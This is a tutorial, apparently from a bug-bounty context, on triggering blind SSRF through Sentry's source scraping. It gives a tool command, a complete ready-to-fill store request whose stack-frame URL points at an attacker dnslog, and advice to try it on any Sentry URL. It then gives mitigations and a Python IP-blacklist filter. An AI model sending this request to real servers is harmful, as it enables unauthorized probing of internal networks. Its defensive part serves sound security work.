Whenever you see "sentry" somewhere in a URL, it is worth trying the Sentry exploit (Sentry is a real-time event logging and aggregation platform). It works because Sentry enables source code scraping by default: when a submitted JavaScript event's stack trace names a script file by URL, the server fetches that file itself, so an attacker can trigger blind SSRF requests from the outside.
(python3) ➜ sentrySSRF git:(master) python sentrySSRF.py -i http://【your target url】 -d
Found Sentry: https://ef00ffc3xxxxxe5b60afff8c138c77e@【your target url】/1
Enter your burpcollaborator address:【your dnslog】
Then go to your dnslog and check whether a request was recorded. The request the tool sends (which you can also replay by hand from Burp) looks like this:
POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2f3.15.0&sentry_key=【your key】 HTTP/1.1
Host: 【your target url】.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Content-type: application/json
Origin: 【any domain】
Content-Length: 329

{"project":"30","logger":"javascript","platform":"javascript","exception":{"values":[{"type":"Error","value":"Trying to get control scope but angular isn't ready yet or something like this","stacktrace":{"frames":[{"filename":"http://【your dnslog】","lineno":110,"colno":81071,"function":"XMLHttpRequest.o","in_app":true}]}}]}}
sentry_version = the value marked as red line 2 in the original screenshot (not reproduced here); if the server returns an error, manually try a few other versions.
sentry_key = the public key from Raven.config, marked as red line 1 in the original screenshot; it is the part before the @ in the DSN the tool printed.
origin = any value works.
The project id in the path (/api/1/store/) is the trailing number of the DSN the tool found (…/1 above), and the filename of the stack frame is the URL Sentry will fetch, so point it at your dnslog host.
Mitigations:
1. Disable source code scraping in Sentry.
2. Make sure the IP blacklist in the config file (/sentry/conf/server.py, the SENTRY_DISALLOWED_IPS setting) is not empty, so that the scraper refuses to fetch loopback, private and link-local addresses.
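What a non-empty blacklist has to enforce, written out as a hypothetical fetch filter (an added example; this is not Sentry's implementation). The network list is constructed for the example, the resolver is injectable so the check can be exercised without DNS, and the last case shows why an empty blacklist is the failure the page warns about: with no networks every URL passes.

```python
"""Added example (hypothetical, not Sentry's code): refuse to scrape any stack-frame
URL whose host is a loopback, private, link-local or otherwise internal address."""
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed blacklist: the minimum a server.py IP blacklist should contain.
DISALLOWED_NETWORKS = [ipaddress.ip_network(c) for c in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10")]


def resolve_all(host):
    """Every A/AAAA answer for a name; one internal answer is enough to reject it."""
    return sorted({info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)})


def url_is_disallowed(url, networks=DISALLOWED_NETWORKS, resolver=resolve_all):
    """True when the scraper must not request this URL. Fails closed on bad input."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return True                      # file://, gopher://, data:, empty host
    host = parts.hostname
    try:
        ipaddress.ip_address(host)
        addrs = [host]                   # IP literal, no DNS lookup needed
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:                  # socket.gaierror is an OSError
            return True                  # unresolvable name: fail closed
    if not addrs:
        return True
    return any(ipaddress.ip_address(a) in net for a in addrs for net in networks)


def fetchable_frames(frames, networks=DISALLOWED_NETWORKS, resolver=resolve_all):
    """Filter an event's stack frames down to the filenames the scraper may fetch."""
    return [f["filename"] for f in frames
            if not url_is_disallowed(f["filename"], networks, resolver)]
```

One caveat for whoever ports this into a real fetcher: checking the address once at resolution time is not enough. The check has to be repeated on the address actually connected to (DNS rebinding) and on every redirect target, because a 302 from an external host to http://169.254.169.254/ otherwise walks straight through the blacklist.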
https://hackerone.com/reports/374737
https://github.com/xawdxawdx/sentrySSRF